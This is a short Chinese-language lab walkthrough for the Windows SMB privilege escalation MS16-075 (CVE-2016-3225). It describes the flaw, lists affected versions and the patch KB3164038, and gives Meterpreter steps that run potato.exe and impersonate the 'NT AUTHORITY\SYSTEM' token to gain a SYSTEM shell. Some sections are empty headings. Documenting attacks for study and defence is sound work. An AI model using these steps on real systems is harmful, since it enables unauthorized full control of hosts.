3.7.3 ms16-075

漏洞名称

MS16-075 Windows SMB 服务器特权提升漏洞(CVE-2016-3225)

漏洞等级

高危

漏洞描述

Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。

漏洞影响

Windows Vista-2012 r2

复现过程

实验环境

kali:192.168.1.103 server 08 :192.168.1.104

复现

假设已经成功上线了msf

将系统信息导出并下载到本地

然后使用windows-exploit-suggestions进行查看

python windows-exploit-suggester.py -i bug.txt -d 2019-05-26-mssb.xls -l

msf下提权命令利用程序。

然后:

(4)execute -cH -f ./potato.exe (5)list_tokens -u (6)impersonate_token "NT AUTHORITY\SYSTEM" (7)getuid

即可获得一个system权限的shell

msf下也自带了这种工具,不过并不好用,分别为

给出一个比较好的msf的插件

powershell下提权

漏洞修复

KB3164038

Last updated

Was this helpful?